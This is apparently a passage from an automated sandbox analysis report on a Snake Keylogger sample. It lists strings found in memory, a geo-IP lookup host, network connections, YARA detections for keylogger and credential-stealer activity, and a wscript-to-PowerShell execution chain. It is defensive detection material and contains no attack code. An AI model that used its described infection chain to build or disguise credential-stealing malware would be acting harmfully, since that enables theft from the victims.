                  Source: qmgr.db.53.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.53.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.53.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.53.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: qmgr.db.53.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                  Source: InstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002AE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FA9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.000000000300D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329661615.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2326342412.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2328065250.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microso
                  Source: doc1.exe, 00000001.00000002.2293545434.0000000002BB8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                  Source: qmgr.db.53.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                  Source: svchost.exe, 00000035.00000003.3336685881.000001E75A600000.00000004.00000800.00020000.00000000.sdmp, edb.log.53.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                  Source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: doc1.exe, 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: InstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002CDA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F59000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: doc1.exe, 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: InstallUtil.exe, 0000001A.00000002.3460956266.000000000300D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                  Source: InstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002CDA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F59000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FA9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.000000000300D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                  Source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: doc1.exe, 00000001.00000002.2293545434.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: https://www.globalsign.com/repository/0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.6:49735 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.6:49738 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: amsi64_3508.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi64_2188.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi64_6756.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi64_2548.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi64_2744.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi64_4568.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 1.2.doc1.exe.3c2d068.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 11.2.bosotkm.exe.417bdd0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 1.2.doc1.exe.3c2d068.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 11.2.bosotkm.exe.417bdd0.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0000001A.00000002.3442953774.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: InstallUtil.exe PID: 5392, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: InstallUtil.exe PID: 1596, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
